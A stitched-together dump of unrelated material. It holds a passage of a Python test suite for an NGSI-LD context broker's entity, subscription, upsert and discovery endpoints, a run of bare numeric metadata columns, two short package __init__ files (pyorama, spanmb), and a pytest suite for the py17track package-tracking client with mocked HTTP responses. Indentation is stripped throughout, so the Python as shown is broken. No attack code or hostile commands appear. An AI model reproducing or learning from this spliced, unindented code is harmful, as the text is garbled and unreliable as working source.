#print(r.status_code)
assert r.status_code == 201
#testCase 48
'''
To test if attribute deletion is reflected over discovery
'''
def test_case48():
#to create an entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata38),headers=headers)
#print(r.content)
#print(r.status_code)
#to fetch the registration from discovery
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"])
print("\nchecking if brandName attribute is present in discovery before deletion")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"]["type"] == "Property":
print("\n-----> brandName is existing...!!")
else:
print("\n-----> brandName does not exist..!")
else:
print("\nNot Validated")
#print(r.status_code)
#to delete brandName attribute
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A3000/attrs/brandName"
r=requests.delete(url)
#print(r.content)
#print(r.status_code)
#To fetch registration again from discovery
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"])
print("\nchecking if brandName attribute is present in discovery after deletion")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if "https://uri.etsi.org/ngsi-ld/default-context/brandName" in resp["AttributesList"]:
print("\n-----> brandName is existing...!!")
else:
print("\n-----> brandName does not exist because deleted...!")
else:
print("\nNot Validated")
assert r.status_code == 200
#testCase 49
'''
To test if an appended attribute is reflected over discovery
'''
def test_case49():
#to fetch registration of entity from discovery before appending
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"])
print("\nchecking if brandName1 attribute is present in discovery before appending")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if "https://uri.etsi.org/ngsi-ld/default-context/brandName1" in resp["AttributesList"]:
print("\n-----> brandName1 is existing...!!")
else:
print("\n-----> brandName1 does not exist yet...!")
else:
print("\nNot Validated")
#to append an entity with id as urn:ngsi-ld:Vehicle:A3000
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata4c),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#to fetch registration of entity from discovery after appending
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"])
print("\nchecking if brandName1 attribute is present in discovery after appending")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if "https://uri.etsi.org/ngsi-ld/default-context/brandName1" in resp["AttributesList"]:
print("\n-----> brandName1 is existing after appending...!!")
else:
print("\n-----> brandName1 does not exist yet...!")
else:
print("\nNot Validated")
assert r.status_code == 200
#testCase 50
'''
To test if discovery's context availability is updated on update
'''
def test_case50():
#to create entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata40),headers=headers)
#print(r.content)
#print(r.status_code)
#to create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata39),headers=headers)
#print(r.content)
#print(r.status_code)
#Update entity to fire notification
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata41),headers=headers)
#print(r.status_code)
#to validate
url="http://0.0.0.0:8888/validateNotification"
r=requests.post(url,json={"subscriptionId" : "urn:ngsi-ld:Subscription:020"})
print(r.content)
assert r.status_code == 200
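#NOTE: http://0.0.0.0:8888/validateNotification (also used in testCase 73) is
#assumed to be a local notification accumulator started alongside these tests;
#it is not part of the NGSI-LD broker API itself.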
# testCase 51
'''
To test if instanceId is fetched while creating entity
'''
def test_case51():
# to create entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata42),headers=headers)
#print(r.content)
#print(r.status_code)
# to fetch and verify instanceId
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:C001"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["brandName1"]["instanceId"]=="instance1":
print("\nValidated")
else:
print("\nNot Validated")
print(r.status_code)
assert r.status_code == 200
# testCase 52
'''
To test if datasetId is fetched while creating entity
'''
def test_case52():
# to create entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata43),headers=headers)
#print(r.content)
#print(r.status_code)
# to fetch and verify datasetId
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:C002"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["brandName1"]["datasetId"]=="dataset1":
print("\nValidated")
else:
print("\nNot Validated")
print(r.status_code)
assert r.status_code == 200
#testCase 53
'''
To test for subscription without entities in payload
'''
def test_case53():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata44),headers=headers)
print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 54
'''
To test for subscription with different type in payload
'''
def test_case54():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata45),headers=headers)
print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 55
'''
To test Upsert API for single entity creation
'''
def test_case55():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/ld + json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata46),headers=headers)
print(r.content)
assert r.status_code == 500
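#NOTE: the spaces in the 'application/ld + json' Content-Type above look
#deliberate: an invalid media type for which this broker is expected to
#respond with 500 rather than 400.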
#testCase 56
'''
To test Upsert API for multiple entity creation
'''
def test_case56():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata47),headers=headers)
print(r.content)
assert r.status_code == 204
#testCase 57
'''
To test Upsert API for entity creation with a different payload
'''
def test_case57():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata48),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 58
'''
To test Upsert API for entity creation with different headers
'''
def test_case58():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/abc+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata47),headers=headers)
print(r.content)
assert r.status_code == 500
#testCase 59
'''
To test Upsert API for entity creation with one empty payload in the entities array
'''
def test_case59():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata49),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 60
'''
To test Upsert API for multiple entity creation with missing id in first entity
'''
def test_case60():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata50),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 61
'''
To test Upsert API for multiple entity creation with missing id in second entity
'''
def test_case61():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata51),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 62
'''
To test Upsert API for multiple entity creation with missing id in both entities
'''
def test_case62():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata52),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 63
'''
To test Upsert API for multiple entity creation with missing type in first entity
'''
def test_case63():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata53),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 64
'''
To test Upsert API for multiple entity creation with missing type in second entity
'''
def test_case64():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata54),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 65
'''
To test Upsert API for multiple entity creation with missing type in both entities
'''
def test_case65():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata55),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 66
'''
To test Upsert API for multiple entity creation with an id that is not a URI in the first entity
'''
def test_case66():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata56),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 67
'''
To test Upsert API for multiple entity creation with an id that is not a URI in the second entity
'''
def test_case67():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata57),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 68
'''
To test Upsert API for multiple entity creation with ids that are not URIs in both entities
'''
def test_case68():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata58),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 69
'''
To test Upsert API for multiple entity creation with an array in the attributes of the first entity
'''
def test_case69():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata59),headers=headers)
print(r.content)
# to fetch the corresponding entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0001"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
assert r.status_code == 200
#testCase 70
'''
To test Upsert API for multiple entity creation with an array in the attributes of both entities
'''
def test_case70():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata60),headers=headers)
print(r.content)
# to fetch the corresponding first entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0101"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
# to fetch the corresponding second entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A9090"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
assert r.status_code == 200
#testCase71
'''
To test Upsert API for multiple entity creation along with update
'''
def test_case71():
#create entities
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata61),headers=headers)
print(r.content)
# to fetch the corresponding first entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0210"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"])
print("\nchecking the value of brandName attribute on entity creation")
if resp["id"]=="urn:ngsi-ld:Vehicle:A0210":
print(resp["brandName"]["value"])
#create entities
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata62),headers=headers)
#print(r.content)
# to fetch the corresponding first entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0210"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"])
print("\nchecking the value of brandName attribute after entity update")
if resp["id"]=="urn:ngsi-ld:Vehicle:A0210":
print(resp["brandName"]["value"])
assert r.status_code == 200
#testCase72
'''
To test registration on discovery
'''
def test_case72():
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A0210"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
print(resp)
if resp["ID"]=="urn:ngsi-ld:Vehicle:A0210":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase73
'''
To test subscription for entities created using the Upsert API
'''
def test_case73():
#to create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata63),headers=headers)
#print(r.content)
#print(r.status_code)
#Update entity to fire notification
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata64),headers=headers)
#print(r.status_code)
#to validate
url="http://0.0.0.0:8888/validateNotification"
r=requests.post(url,json={"subscriptionId" : "urn:ngsi-ld:Subscription:Upsert"})
print(r.content)
assert r.status_code == 200
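#To run this suite (assuming pytest and reachable broker/discovery endpoints;
#the file name test_ngsild.py is hypothetical): pytest -v test_ngsild.py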
| 39.333856
| 199
| 0.654612
| 6,720
| 50,190
| 4.839286
| 0.06369
| 0.048524
| 0.051415
| 0.049139
| 0.894004
| 0.877337
| 0.863899
| 0.843266
| 0.830197
| 0.807103
| 0
| 0.024309
| 0.182008
| 50,190
| 1,275
| 200
| 39.364706
| 0.767799
| 0.094561
| 0
| 0.716981
| 0
| 0.079826
| 0.387208
| 0.125624
| 0
| 0
| 0
| 0
| 0.107402
| 0
| null | null | 0
| 0.013062
| null | null | 0.166909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d46a649ec2e15b87ebfb500d32d4d67cbf172b6
| 177
|
py
|
Python
|
pyorama/data/__init__.py
|
AnishN/pyorama
|
e2248f6f915412436f29d0712d172d22a47aece1
|
[
"MIT"
] | 7
|
2019-09-23T04:47:01.000Z
|
2022-02-20T14:48:39.000Z
|
pyorama/data/__init__.py
|
AnishN/pyorama
|
e2248f6f915412436f29d0712d172d22a47aece1
|
[
"MIT"
] | null | null | null |
pyorama/data/__init__.py
|
AnishN/pyorama
|
e2248f6f915412436f29d0712d172d22a47aece1
|
[
"MIT"
] | 2
|
2018-01-04T15:49:08.000Z
|
2021-08-09T04:17:41.000Z
|
from pyorama.data.buffer import *
from pyorama.data.handle import *
from pyorama.data.hash_map import *
from pyorama.data.slot_map import *
from pyorama.data.vector import *
| 35.4
| 36
| 0.785311
| 27
| 177
| 5.074074
| 0.37037
| 0.40146
| 0.547445
| 0.613139
| 0.350365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129944
| 177
| 5
| 37
| 35.4
| 0.88961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
5391fb10e9627a38fede27b98853739af0708548
| 118
|
py
|
Python
|
spanmb/data/__init__.py
|
zmmzGitHub/SpanMB_BERT
|
133c93e2876e27379f249df3922e531e2be66f04
|
[
"MIT"
] | null | null | null |
spanmb/data/__init__.py
|
zmmzGitHub/SpanMB_BERT
|
133c93e2876e27379f249df3922e531e2be66f04
|
[
"MIT"
] | null | null | null |
spanmb/data/__init__.py
|
zmmzGitHub/SpanMB_BERT
|
133c93e2876e27379f249df3922e531e2be66f04
|
[
"MIT"
] | null | null | null |
from spanmb.data.dataset_readers.spanmb import SpanMBReader
from spanmb.data.dataset_readers.document import Document
| 39.333333
| 59
| 0.881356
| 16
| 118
| 6.375
| 0.5
| 0.196078
| 0.27451
| 0.411765
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 118
| 2
| 60
| 59
| 0.927273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
53ab1251d653b16fdfe48e5d85a40ffbc3c385d9
| 11,166
|
py
|
Python
|
tests/test_profile.py
|
regevbr/py17track
|
0553e8b10dccdff05949760042cf8db936f2c094
|
[
"MIT"
] | 23
|
2018-07-28T17:44:03.000Z
|
2022-03-14T19:30:27.000Z
|
tests/test_profile.py
|
regevbr/py17track
|
0553e8b10dccdff05949760042cf8db936f2c094
|
[
"MIT"
] | 62
|
2018-10-31T03:58:05.000Z
|
2022-03-14T20:18:41.000Z
|
tests/test_profile.py
|
regevbr/py17track
|
0553e8b10dccdff05949760042cf8db936f2c094
|
[
"MIT"
] | 9
|
2020-10-16T10:49:42.000Z
|
2022-02-17T04:24:26.000Z
|
"""Define tests for the client object."""
from datetime import datetime
import aiohttp
import pytest
from pytz import UTC, timezone
from py17track import Client
from py17track.errors import InvalidTrackingNumberError, RequestError
from .common import TEST_EMAIL, TEST_PASSWORD, load_fixture
@pytest.mark.asyncio
async def test_login_failure(aresponses):
"""Test that a failed login returns the correct response."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_failure_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
login_result = await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
assert login_result is False
@pytest.mark.asyncio
async def test_login_success(aresponses):
"""Test that a successful login returns the correct response."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
login_result = await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
assert login_result is True
@pytest.mark.asyncio
async def test_no_explicit_session(aresponses):
"""Test not providing an explicit aiohttp ClientSession."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
client = Client()
login_result = await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
assert login_result is True
@pytest.mark.asyncio
async def test_packages(aresponses):
"""Test getting packages."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
packages = await client.profile.packages()
assert len(packages) == 5
assert packages[0].location == "Paris"
assert packages[1].location == "Spain"
assert packages[2].location == "Milano Italy"
assert packages[3].location == ""
@pytest.mark.asyncio
async def test_packages_default_timezone(aresponses):
"""Test getting packages with default timezone."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
packages = await client.profile.packages()
assert len(packages) == 5
assert packages[0].timestamp.isoformat() == "2018-04-23T12:02:00+00:00"
assert packages[1].timestamp.isoformat() == "2019-02-26T01:05:34+00:00"
assert packages[2].timestamp.isoformat() == "1970-01-01T00:00:00+00:00"
@pytest.mark.asyncio
async def test_packages_user_defined_timezone(aresponses):
"""Test getting packages with user-defined timezone."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
packages = await client.profile.packages(tz="Asia/Jakarta")
assert len(packages) == 5
assert packages[0].timestamp.isoformat() == "2018-04-23T05:02:00+00:00"
assert packages[1].timestamp.isoformat() == "2019-02-25T18:05:34+00:00"
assert packages[2].timestamp.isoformat() == "1970-01-01T00:00:00+00:00"
@pytest.mark.asyncio
async def test_summary(aresponses):
"""Test getting package summary."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("summary_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
summary = await client.profile.summary()
assert summary["Delivered"] == 0
assert summary["Expired"] == 0
assert summary["In Transit"] == 6
assert summary["Not Found"] == 2
assert summary["Ready to be Picked Up"] == 0
assert summary["Returned"] == 0
assert summary["Undelivered"] == 0
@pytest.mark.asyncio
async def test_add_new_package(aresponses):
"""Test adding a new package."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("LP00432912409987")
@pytest.mark.asyncio
async def test_add_new_package_with_friendly_name(aresponses):
"""Test adding a new package with friendly name."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("set_friendly_name_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321", "Friendly name")
@pytest.mark.asyncio
async def test_add_new_package_with_friendly_name_not_found(aresponses):
"""Test adding a new package with friendly name but package not found after adding it."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("set_friendly_name_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
with pytest.raises(InvalidTrackingNumberError):
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321567", "Friendly name")
@pytest.mark.asyncio
async def test_add_new_package_with_friendly_name_error_response(aresponses):
"""Test adding a new package with friendly name but setting the name fails."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("set_friendly_name_failure_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
with pytest.raises(RequestError):
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321", "Friendly name")
